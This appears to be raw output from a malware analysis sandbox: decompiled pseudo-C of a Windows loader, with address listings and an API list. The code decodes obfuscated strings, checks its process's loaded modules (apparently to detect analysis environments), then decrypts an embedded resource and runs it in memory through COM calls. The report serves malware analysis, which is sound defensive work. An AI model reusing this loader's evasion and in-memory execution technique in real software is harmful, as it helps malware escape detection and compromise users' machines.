                              				 *((char*)(_t556 + 0x38)) = 0;
                              				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
                              				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
                              				_t557 = _t556 + 0xc;
                              				if(_t337 == 0x41b2a0) {
                              					L80:
                              					__eflags = 0;
                              					return 0;
                              				} else {
                              					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
                              					_t525 = _t340;
                              					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
                              					 *((char*)(_t557 + 0x64)) = 0xce;
                              					 *((char*)(_t557 + 0x65)) = 0x27;
                              					 *((char*)(_t557 + 0x66)) = 0x9c;
                              					 *((char*)(_t557 + 0x67)) = 0x1a;
                              					 *((char*)(_t557 + 0x68)) = 0x95;
                              					 *((char*)(_t557 + 0x69)) = 0x2e;
                              					 *((char*)(_t557 + 0x6a)) = 0x22;
                              					 *((char*)(_t557 + 0x6b)) = 0x57;
                              					 *((char*)(_t557 + 0x6c)) = 0x91;
                              					 *((char*)(_t557 + 0x6d)) = 0x21;
                              					 *((char*)(_t557 + 0x6e)) = 0x57;
                              					 *((char*)(_t557 + 0x6f)) = 0x3a;
                              					 *((char*)(_t557 + 0x70)) = 0xf8;
                              					 *((char*)(_t557 + 0x71)) = 0x98;
                              					 *((char*)(_t557 + 0x72)) = 0x5b;
                              					 *((char*)(_t557 + 0x73)) = 0xf4;
                              					 *((char*)(_t557 + 0x74)) = 0xb5;
                              					 *((char*)(_t557 + 0x75)) = 0x87;
                              					 *((char*)(_t557 + 0x76)) = 0x7b;
                              					 *((char*)(_t557 + 0x77)) = 0xf;
                              					 *((char*)(_t557 + 0x78)) = 0xf4;
                              					 *((char*)(_t557 + 0x79)) = 0x76;
                              					 *((char*)(_t557 + 0x7a)) = 0xb9;
                              					 *((char*)(_t557 + 0x7b)) = 0x34;
                              					 *((char*)(_t557 + 0x7c)) = 0xbf;
                              					 *((char*)(_t557 + 0x7d)) = 0x1e;
                              					 *((char*)(_t557 + 0x7e)) = 0xe7;
                              					 *((char*)(_t557 + 0x7f)) = 0x78;
                              					 *((char*)(_t557 + 0x80)) = 0x98;
                              					 *((char*)(_t557 + 0x81)) = 0xe9;
                              					 *((char*)(_t557 + 0x82)) = 0x6f;
                              					 *((char*)(_t557 + 0x83)) = 0xb4;
                              					 *((char*)(_t557 + 0x84)) = 0;
                              					 *((char*)(_t557 + 0x18)) = 0xc0;
                              					 *((char*)(_t557 + 0x19)) = 0x38;
                              					 *((char*)(_t557 + 0x1a)) = 0x8d;
                              					 *((char*)(_t557 + 0x1b)) = 0x1f;
                              					 *((char*)(_t557 + 0x1c)) = 0x8e;
                              					 *((char*)(_t557 + 0x1d)) = 0x30;
                              					 *((char*)(_t557 + 0x1e)) = 0x65;
                              					 *((char*)(_t557 + 0x1f)) = 0x47;
                              					 *((char*)(_t557 + 0x20)) = 0xd3;
                              					 *((char*)(_t557 + 0x21)) = 0x29;
                              					 *((char*)(_t557 + 0x22)) = 0x3b;
                              					 *((char*)(_t557 + 0x23)) = 0x56;
                              					 *((char*)(_t557 + 0x24)) = 0xf8;
                              					 *((char*)(_t557 + 0x25)) = 0x98;
                              					 *((char*)(_t557 + 0x26)) = 0x5b;
                              					 *((char*)(_t557 + 0x27)) = 0xf4;
                              					 *((char*)(_t557 + 0x28)) = 0xb5;
                              					 *((char*)(_t557 + 0x29)) = 0x87;
                              					 *((char*)(_t557 + 0x2a)) = 0x7b;
                              					 *((char*)(_t557 + 0x2b)) = 0xf;
                              					 *((char*)(_t557 + 0x2c)) = 0xf4;
                              					 *((char*)(_t557 + 0x2d)) = 0x76;
                              					 *((char*)(_t557 + 0x2e)) = 0xb9;
                              					 *((char*)(_t557 + 0x2f)) = 0x34;
                              					 *((char*)(_t557 + 0x30)) = 0xbf;
                              					 *((char*)(_t557 + 0x31)) = 0x1e;
                              					 *((char*)(_t557 + 0x32)) = 0xe7;
                              					 *((char*)(_t557 + 0x33)) = 0x78;
                              					 *((char*)(_t557 + 0x34)) = 0x98;
                              					 *((char*)(_t557 + 0x35)) = 0xe9;
                              					 *((char*)(_t557 + 0x36)) = 0x6f;
                              					 *((char*)(_t557 + 0x37)) = 0xb4;
                              					 *((char*)(_t557 + 0x38)) = 0;
                              					_t341 = Module32First(_t525, _t557 + 0x278); // executed
                              					if(_t341 == 0) {
                              						L38:
                              						CloseHandle(_t525);
                              						_t526 = GetModuleHandleA(0);
                              						 *((char*)(_t557 + 0x1c)) = 0xfc;
                              						 *((char*)(_t557 + 0x1d)) = 0xb;
                              						 *((char*)(_t557 + 0x1e)) = 0xff;
                              						 *((char*)(_t557 + 0x1f)) = 0x75;
                              						 *((char*)(_t557 + 0x20)) = 0xe7;
                              						 *((char*)(_t557 + 0x21)) = 0x44;
                              						 *((char*)(_t557 + 0x22)) = 0x4b;
                              						 *((char*)(_t557 + 0x23)) = 0x23;
                              						 *((char*)(_t557 + 0x24)) = 0xbf;
                              						 *((char*)(_t557 + 0x25)) = 0x45;
                              						 *((char*)(_t557 + 0x26)) = 0x3b;
                              						 *((char*)(_t557 + 0x27)) = 0x56;
                              						 *((char*)(_t557 + 0x28)) = 0xf8;
                              						 *((char*)(_t557 + 0x29)) = 0x98;
                              						 *((char*)(_t557 + 0x2a)) = 0x5b;
                              						 *((char*)(_t557 + 0x2b)) = 0xf4;
                              						 *((char*)(_t557 + 0x2c)) = 0xb5;
                              						 *((char*)(_t557 + 0x2d)) = 0x87;
                              						 *((char*)(_t557 + 0x2e)) = 0x7b;
                              						 *((char*)(_t557 + 0x2f)) = 0xf;
                              						 *((char*)(_t557 + 0x30)) = 0xf4;
                              						 *((char*)(_t557 + 0x31)) = 0x76;
                              						 *((char*)(_t557 + 0x32)) = 0xb9;
                              						 *((char*)(_t557 + 0x33)) = 0x34;
                              						 *((char*)(_t557 + 0x34)) = 0xbf;
                              						 *((char*)(_t557 + 0x35)) = 0x1e;
                              						 *((char*)(_t557 + 0x36)) = 0xe7;
                              						 *((char*)(_t557 + 0x37)) = 0x78;
                              						 *((char*)(_t557 + 0x38)) = 0x98;
                              						 *((char*)(_t557 + 0x39)) = 0xe9;
                              						 *((char*)(_t557 + 0x3a)) = 0x6f;
                              						 *((char*)(_t557 + 0x3b)) = 0xb4;
                              						 *((char*)(_t557 + 0x3c)) = 0;
                              						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                              						_t558 = _t557 + 8;
                              						_t536 = FindResourceA(_t526, _t344, 0xa);
                              						 *(_t558 + 0x50) = _t536;
                              						_t551 = LoadResource(_t526, _t536);
                              						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                              						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                              						_push(0x40022);
                              						_t537 = _t349; // executed
                              						_t350 = E0040AF66(0, _t526, __eflags); // executed
                              						_t559 = _t558 + 8;
                              						 *(_t559 + 0x34) = _t350;
                              						__eflags = _t350;
                              						if(_t350 == 0) {
                              							 *(_t559 + 0x50) = 0;
                              						} else {
                              							E0040BA30(_t526, _t350, 0, 0x40022);
                              							_t486 =  *(_t559 + 0x40);
                              							_t559 = _t559 + 0xc;
                              							 *(_t559 + 0x50) = _t486;
                              						}
                              						E00401300( *(_t559 + 0x50));
                              						_t497 =  *(_t559 + 0x48);
                              						_t352 = SizeofResource(_t526, _t497);
                              						 *(_t559 + 0x40) = _t352;
                              						asm("cdq");
                              						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                              						__eflags = _t354;
                              						if(_t354 > 0) {
                              							_t519 =  *(_t559 + 0x3c);
                              							_t482 = _t537 - _t519;
                              							__eflags = _t482;
                              							 *(_t559 + 0x34) = _t519;
                              							 *(_t559 + 0x88) = _t482;
                              							 *(_t559 + 0x38) = _t354;
                              							do {
                              								_t424 =  *(_t559 + 0x34);
                              								_push( *(_t559 + 0x88) + _t424);
                              								_push(0x400);
                              								_push(_t424);
                              								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                              								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                              								_t179 = _t559 + 0x38;
                              								 *_t179 =  *(_t559 + 0x38) - 1;
                              								__eflags =  *_t179;
                              							} while ( *_t179 != 0);
                              						}
                              						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                              						__eflags = _t448;
                              						if(_t448 < 0) {
                              							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                              							__eflags = _t448;
                              						}
                              						__eflags = _t448;
                              						if(_t448 > 0) {
                              							_t421 =  *(_t559 + 0x40) - _t448;
                              							_push(_t421 + _t537);
                              							_push(_t448);
                              							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                              							__eflags = _t422;
                              							_push(_t422);
                              							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                              						}
                              						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                              						_t560 = _t559 + 0xc;
                              						FreeResource(_t551);
                              						_t552 =  *_t537;
                              						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                              						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                              						_t561 = _t560 + 4;
                              						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                              						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                              						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                              						_t192 = _t537 + 4; // 0x4
                              						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                              						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                              						_t528 = _t527 + 0xe;
                              						 *((char*)(_t561 + 0x34)) = 0xce;
                              						 *((char*)(_t561 + 0x35)) = 0x27;
                              						 *((char*)(_t561 + 0x36)) = 0x9c;
                              						 *((char*)(_t561 + 0x37)) = 0x1a;
                              						 *((char*)(_t561 + 0x38)) = 0x95;
                              						 *((char*)(_t561 + 0x39)) = 0x21;
                              						 *((char*)(_t561 + 0x3a)) = 0x2e;
                              						 *((char*)(_t561 + 0x3b)) = 0xd;
                              						 *((char*)(_t561 + 0x3c)) = 0xdb;
                              						 *((char*)(_t561 + 0x3d)) = 0x29;
                              						 *((char*)(_t561 + 0x3e)) = 0x57;
                              						 *((char*)(_t561 + 0x3f)) = 0x56;
                              						 *((char*)(_t561 + 0x40)) = 0xf8;
                              						 *((char*)(_t561 + 0x41)) = 0x98;
                              						 *((char*)(_t561 + 0x42)) = 0x5b;
                              						 *((char*)(_t561 + 0x43)) = 0xf4;
                              						 *((char*)(_t561 + 0x44)) = 0xb5;
                              						 *((char*)(_t561 + 0x45)) = 0x87;
                              						 *((char*)(_t561 + 0x46)) = 0x7b;
                              						 *((char*)(_t561 + 0x47)) = 0xf;
                              						 *((char*)(_t561 + 0x48)) = 0xf4;
                              						 *((char*)(_t561 + 0x49)) = 0x76;
                              						 *((char*)(_t561 + 0x4a)) = 0xb9;
                              						 *((char*)(_t561 + 0x4b)) = 0x34;
                              						 *((char*)(_t561 + 0x4c)) = 0xbf;
                              						 *((char*)(_t561 + 0x4d)) = 0x1e;
                              						 *((char*)(_t561 + 0x4e)) = 0xe7;
                              						 *((char*)(_t561 + 0x4f)) = 0x78;
                              						 *((char*)(_t561 + 0x50)) = 0x98;
                              						 *((char*)(_t561 + 0x51)) = 0xe9;
                              						 *((char*)(_t561 + 0x52)) = 0x6f;
                              						 *((char*)(_t561 + 0x53)) = 0xb4;
                              						 *((char*)(_t561 + 0x54)) = 0;
                              						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                              						_t562 = _t561 + 0x24;
                              						_t365 = LoadLibraryA(_t364); // executed
                              						_t538 = _t365;
                              						 *((char*)(_t562 + 0x10)) = 0xe0;
                              						 *((char*)(_t562 + 0x11)) = 0x18;
                              						 *((char*)(_t562 + 0x12)) = 0xad;
                              						 *((char*)(_t562 + 0x13)) = 0x36;
                              						 *((char*)(_t562 + 0x14)) = 0x95;
                              						 *((char*)(_t562 + 0x15)) = 0x21;
                              						_t451 = _t562 + 0x134;
                              						 *((char*)(_t562 + 0x1e)) = 0x2a;
                              						 *((char*)(_t562 + 0x1f)) = 0x57;
                              						 *((char*)(_t562 + 0x20)) = 0xda;
                              						 *((char*)(_t562 + 0x21)) = 0xc;
                              						 *((char*)(_t562 + 0x22)) = 0x55;
                              						 *((char*)(_t562 + 0x23)) = 0x25;
                              						 *((char*)(_t562 + 0x24)) = 0x8c;
                              						 *((char*)(_t562 + 0x25)) = 0xf9;
                              						 *((char*)(_t562 + 0x26)) = 0x35;
                              						 *((char*)(_t562 + 0x27)) = 0x97;
                              						 *((char*)(_t562 + 0x28)) = 0xd0;
                              						 *((char*)(_t562 + 0x29)) = 0x87;
                              						 *((char*)(_t562 + 0x2a)) = 0x7b;
                              						 *((char*)(_t562 + 0x2b)) = 0xf;
                              						 *((char*)(_t562 + 0x2c)) = 0xf4;
                              						 *((char*)(_t562 + 0x2d)) = 0x76;
                              						 *((char*)(_t562 + 0x2e)) = 0xb9;
                              						 *((char*)(_t562 + 0x2f)) = 0x34;
                              						 *((char*)(_t562 + 0x30)) = 0xbf;
                              						 *((char*)(_t562 + 0x31)) = 0x1e;
                              						 *((char*)(_t562 + 0x32)) = 0xe7;
                              						 *((char*)(_t562 + 0x33)) = 0x78;
                              						 *((char*)(_t562 + 0x34)) = 0x98;
                              						 *((char*)(_t562 + 0x35)) = 0xe9;
                              						 *((char*)(_t562 + 0x36)) = 0x6f;
                              						 *((char*)(_t562 + 0x37)) = 0xb4;
                              						 *((char*)(_t562 + 0x38)) = 0;
                              						_t366 = E00401650(_t562 + 0x14, _t451);
                              						_t563 = _t562 + 8;
                              						_t367 = GetProcAddress(_t365, _t366);
                              						__eflags = _t367;
                              						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                              						__eflags = _t452;
                              						 *(_t563 + 0x47) = _t452 == 0;
                              						 *0x423480 = _t367;
                              						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                              						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                              						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                              						 *(_t563 + 0x58) = 0;
                              						 *(_t563 + 0x54) = 0;
                              						__eflags = _t452;
                              						if(_t452 != 0) {
                              							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                              							__eflags = _t368;
                              							if(_t368 >= 0) {
                              								__eflags =  *(_t563 + 0x47);
                              								if( *(_t563 + 0x47) == 0) {
                              									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                              									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                              									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                              									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                              									__eflags = _t378;
                              									if(_t378 >= 0) {
                              										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                              										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                              										__eflags = _t383;
                              										if(_t383 >= 0) {
                              											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                              											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                              											__eflags = _t385;
                              											if(_t385 >= 0) {
                              												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                              												E00401870(_t563 + 0x44, _t552, "_._");
                              												_t539 = __imp__#8;
                              												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                              												 *_t539(_t563 + 0x94);
                              												E00401870(_t563 + 0x3c, _t552, "___");
                              												 *_t539(_t563 + 0xa4);
                              												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                              												_t542 =  *(_t563 + 0x58);
                              												__eflags = _t542;
                              												if(_t542 == 0) {
                              													E0040AD90(0x80004003);
                              												}
                              												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                              												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                              												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                              												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                              												_t543 = _t396;
                              												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                              												__imp__#23(_t543, _t563 + 0x48);
                              												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                              												_t564 = _t563 + 0xc;
                              												__imp__#24(_t543);
                              												_t399 =  *(_t564 + 0x54);
                              												__eflags = _t399;
                              												if(_t399 == 0) {
                              													_t399 = E0040AD90(0x80004003);
                              												}
                              												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                              												__eflags = _t543;
                              												if(_t543 != 0) {
                              													__imp__#16(_t543); // executed
                              												}
                              												_t402 =  *(_t564 + 0x34);
                              												__eflags = _t402;
                              												if(_t402 == 0) {
                              													_t402 = E0040AD90(0x80004003);
                              												}
                              												_t469 =  *(_t564 + 0x40);
                              												_t555 = _t402;
                              												__eflags = _t469;
                              												if(_t469 == 0) {
                              													_t531 = 0;
                              													__eflags = 0;
                              												} else {
                              													_t531 =  *_t469;
                              												}
                              												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                              												__imp__#411(0xc, 0, 0);
                              												_t471 =  *(_t564 + 0x3c);
                              												__eflags = _t471;
                              												if(_t471 == 0) {
                              													E0040AD90(0x80004003);
                              												}
                              												_t405 =  *(_t564 + 0x38);
                              												__eflags = _t405;
                              												if(_t405 == 0) {
                              													_t514 = 0;
                              													__eflags = 0;
                              												} else {
                              													_t514 =  *_t405;
                              												}
                              												_t563 = _t564 - 0x10;
                              												_t407 = _t563;
                              												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                              												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                              												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                              												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                              												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                              												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                              												_t538 = __imp__#9; // 0x777dcf00
                              												_t538->i(_t563 + 0xa4);
                              												E004019A0(_t563 + 0x38);
                              												_t538->i(_t563 + 0x94);
                              												_t413 =  *(_t563 + 0x3c);
                              												__eflags = _t413;
                              												if(_t413 != 0) {
                              													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                              												}
                              												E004019A0(_t563 + 0x40);
                              												_t415 =  *(_t563 + 0x34);
                              												__eflags = _t415;
                              												if(_t415 != 0) {
                              													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                              												}
                              											}
                              										}
                              									}
                              									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                              									__eflags = _t379 - _t563 + 0x178;
                              									if(__eflags != 0) {
                              										_push(_t379);
                              										E0040B6B5(0, _t528, _t538, __eflags);
                              										_t563 = _t563 + 4;
                              									}
                              								}
                              							}
                              							_t369 =  *(_t563 + 0x54);
                              							__eflags = _t369;
                              							if(_t369 != 0) {
                              								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                              							}
                              							_t370 =  *(_t563 + 0x58);
                              							__eflags = _t370;
                              							if(_t370 != 0) {
                              								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                              							}
                              						}
                              						goto L80;
                              					} else {
                              						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                              						_t565 = _t557 + 8;
                              						_t547 = _t428;
                              						_t520 = _t565 + 0x298;
                              						while(1) {
                              							_t429 =  *_t520;
                              							if(_t429 !=  *_t547) {
                              								break;
                              							}
                              							if(_t429 == 0) {
                              								L7:
                              								_t429 = 0;
                              							} else {
                              								_t493 =  *((intOrPtr*)(_t520 + 1));
                              								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                              									break;
                              								} else {
                              									_t520 = _t520 + 2;
                              									_t547 = _t547 + 2;
                              									if(_t493 != 0) {
                              										continue;
                              									} else {
                              										goto L7;
                              									}
                              								}
                              							}
                              							L9:
                              							if(_t429 != 0) {
                              								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                              								_t557 = _t565 + 8;
                              								_t548 = _t431;
                              								_t488 = _t557 + 0x298;
                              								while(1) {
                              									_t432 =  *_t488;
                              									__eflags = _t432 -  *_t548;
                              									if(_t432 !=  *_t548) {
                              										break;
                              									}
                              									__eflags = _t432;
                              									if(_t432 == 0) {
                              										L16:
                              										_t432 = 0;
                              									} else {
                              										_t432 =  *((intOrPtr*)(_t488 + 1));
                              										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                              										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                              											break;
                              										} else {
                              											_t488 = _t488 + 2;
                              											_t548 = _t548 + 2;
                              											__eflags = _t432;
                              											if(_t432 != 0) {
                              												continue;
                              											} else {
                              												goto L16;
                              											}
                              										}
                              									}
                              									L18:
                              									__eflags = _t432;
                              									if(_t432 == 0) {
                              										goto L10;
                              									} else {
                              										_t435 = Module32Next(_t525, _t557 + 0x278);
                              										__eflags = _t435;
                              										if(_t435 != 0) {
                              											do {
                              												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                              												_t566 = _t557 + 8;
                              												_t549 = _t437;
                              												_t490 = _t566 + 0x298;
                              												while(1) {
                              													_t438 =  *_t490;
                              													__eflags = _t438 -  *_t549;
                              													if(_t438 !=  *_t549) {
                              														break;
                              													}
                              													__eflags = _t438;
                              													if(_t438 == 0) {
                              														L26:
                              														_t438 = 0;
                              													} else {
                              														_t438 =  *((intOrPtr*)(_t490 + 1));
                              														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                              														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                              															break;
                              														} else {
                              															_t490 = _t490 + 2;
                              															_t549 = _t549 + 2;
                              															__eflags = _t438;
                              															if(_t438 != 0) {
                              																continue;
                              															} else {
                              																goto L26;
                              															}
                              														}
                              													}
                              													L28:
                              													__eflags = _t438;
                              													if(_t438 == 0) {
                              														goto L10;
                              													} else {
                              														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                              														_t557 = _t566 + 8;
                              														_t550 = _t439;
                              														_t492 = _t557 + 0x298;
                              														while(1) {
                              															_t440 =  *_t492;
                              															__eflags = _t440 -  *_t550;
                              															if(_t440 !=  *_t550) {
                              																break;
                              															}
                              															__eflags = _t440;
                              															if(_t440 == 0) {
                              																L34:
                              																_t440 = 0;
                              															} else {
                              																_t440 =  *((intOrPtr*)(_t492 + 1));
                              																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                              																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                              																	break;
                              																} else {
                              																	_t492 = _t492 + 2;
                              																	_t550 = _t550 + 2;
                              																	__eflags = _t440;
                              																	if(_t440 != 0) {
                              																		continue;
                              																	} else {
                              																		goto L34;
                              																	}
                              																}
                              															}
                              															L36:
                              															__eflags = _t440;
                              															if(_t440 == 0) {
                              																goto L10;
                              															} else {
                              																goto L37;
                              															}
                              															goto L81;
                              														}
                              														asm("sbb eax, eax");
                              														asm("sbb eax, 0xffffffff");
                              														goto L36;
                              													}
                              													goto L81;
                              												}
                              												asm("sbb eax, eax");
                              												asm("sbb eax, 0xffffffff");
                              												goto L28;
                              												L37:
                              												_t442 = Module32Next(_t525, _t557 + 0x278);
                              												__eflags = _t442;
                              											} while (_t442 != 0);
                              										}
                              										goto L38;
                              									}
                              									goto L81;
                              								}
                              								asm("sbb eax, eax");
                              								asm("sbb eax, 0xffffffff");
                              								goto L18;
                              							} else {
                              								L10:
                              								CloseHandle(_t525);
                              								return 0;
                              							}
                              							goto L81;
                              						}
                              						asm("sbb eax, eax");
                              						asm("sbb eax, 0xffffffff");
                              						goto L9;
                              					}
                              				}
                              				L81:
                              			}
                              0x00402375
                              0x0040237b
                              0x0040237b
                              0x00402377
                              0x00402377
                              0x00402377
                              0x00402390
                              0x00402396
                              0x0040239c
                              0x004023a0
                              0x004023a2
                              0x004023a9
                              0x004023a9
                              0x004023ae
                              0x004023b2
                              0x004023b4
                              0x004023ba
                              0x004023ba
                              0x004023b6
                              0x004023b6
                              0x004023b6
                              0x004023ce
                              0x004023d1
                              0x004023d3
                              0x004023dd
                              0x004023ec
                              0x004023ef
                              0x004023fe
                              0x00402401
                              0x00402403
                              0x00402411
                              0x00402417
                              0x00402424
                              0x00402426
                              0x0040242a
                              0x0040242c
                              0x00402434
                              0x00402434
                              0x0040243a
                              0x0040243f
                              0x00402443
                              0x00402445
                              0x0040244d
                              0x0040244d
                              0x00402445
                              0x00402251
                              0x0040223d
                              0x0040244f
                              0x0040245d
                              0x0040245f
                              0x00402461
                              0x00402462
                              0x00402467
                              0x00402467
                              0x0040245f
                              0x004021ca
                              0x0040246a
                              0x0040246e
                              0x00402470
                              0x00402478
                              0x00402478
                              0x0040247a
                              0x0040247e
                              0x00402480
                              0x00402488
                              0x00402488
                              0x00402480
                              0x00000000
                              0x00401c55
                              0x00401c62
                              0x00401c67
                              0x00401c6a
                              0x00401c6c
                              0x00401c73
                              0x00401c73
                              0x00401c77
                              0x00000000
                              0x00000000
                              0x00401c7b
                              0x00401c8f
                              0x00401c8f
                              0x00401c7d
                              0x00401c7d
                              0x00401c83
                              0x00000000
                              0x00401c85
                              0x00401c85
                              0x00401c88
                              0x00401c8d
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00401c8d
                              0x00401c83
                              0x00401c98
                              0x00401c9a
                              0x00401cbd
                              0x00401cc2
                              0x00401cc5
                              0x00401cc7
                              0x00401cd0
                              0x00401cd0
                              0x00401cd2
                              0x00401cd4
                              0x00000000
                              0x00000000
                              0x00401cd6
                              0x00401cd8
                              0x00401cec
                              0x00401cec
                              0x00401cda
                              0x00401cda
                              0x00401cdd
                              0x00401ce0
                              0x00000000
                              0x00401ce2
                              0x00401ce2
                              0x00401ce5
                              0x00401ce8
                              0x00401cea
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00401cea
                              0x00401ce0
                              0x00401cf5
                              0x00401cf5
                              0x00401cf7
                              0x00000000
                              0x00401cf9
                              0x00401d02
                              0x00401d07
                              0x00401d09
                              0x00401d10
                              0x00401d1d
                              0x00401d22
                              0x00401d25
                              0x00401d27
                              0x00401d30
                              0x00401d30
                              0x00401d32
                              0x00401d34
                              0x00000000
                              0x00000000
                              0x00401d36
                              0x00401d38
                              0x00401d4c
                              0x00401d4c
                              0x00401d3a
                              0x00401d3a
                              0x00401d3d
                              0x00401d40
                              0x00000000
                              0x00401d42
                              0x00401d42
                              0x00401d45
                              0x00401d48
                              0x00401d4a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00401d4a
                              0x00401d40
                              0x00401d55
                              0x00401d55
                              0x00401d57
                              0x00000000
                              0x00401d5d
                              0x00401d6a
                              0x00401d6f
                              0x00401d72
                              0x00401d74
                              0x00401d80
                              0x00401d80
                              0x00401d82
                              0x00401d84
                              0x00000000
                              0x00000000
                              0x00401d86
                              0x00401d88
                              0x00401d9c
                              0x00401d9c
                              0x00401d8a
                              0x00401d8a
                              0x00401d8d
                              0x00401d90
                              0x00000000
                              0x00401d92
                              0x00401d92
                              0x00401d95
                              0x00401d98
                              0x00401d9a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00401d9a
                              0x00401d90
                              0x00401da5
                              0x00401da5
                              0x00401da7
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00401da7
                              0x00401da0
                              0x00401da2
                              0x00000000
                              0x00401da2
                              0x00000000
                              0x00401d57
                              0x00401d50
                              0x00401d52
                              0x00000000
                              0x00401dad
                              0x00401db6
                              0x00401dbb
                              0x00401dbb
                              0x00401d10
                              0x00000000
                              0x00401d09
                              0x00000000
                              0x00401cf7
                              0x00401cf0
                              0x00401cf2
                              0x00000000
                              0x00401c9c
                              0x00401c9c
                              0x00401c9d
                              0x00401caf
                              0x00401caf
                              0x00000000
                              0x00401c9a
                              0x00401c93
                              0x00401c95
                              0x00000000
                              0x00401c95
                              0x00401c4f
                              0x00000000

                              APIs
                              • OleInitialize.OLE32(00000000), ref: 004019FD
                              • _getenv.LIBCMT ref: 00401ABA
                              • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                              • Module32First.KERNEL32 ref: 00401C48
                              • CloseHandle.KERNEL32(00000000,?,?,00000000,?), ref: 00401C9D
                              • Module32Next.KERNEL32 ref: 00401D02
                              • Module32Next.KERNEL32 ref: 00401DB6
                              • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                              • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                              • FindResourceA.KERNEL32(00000000,00000000,00000000), ref: 00401E90
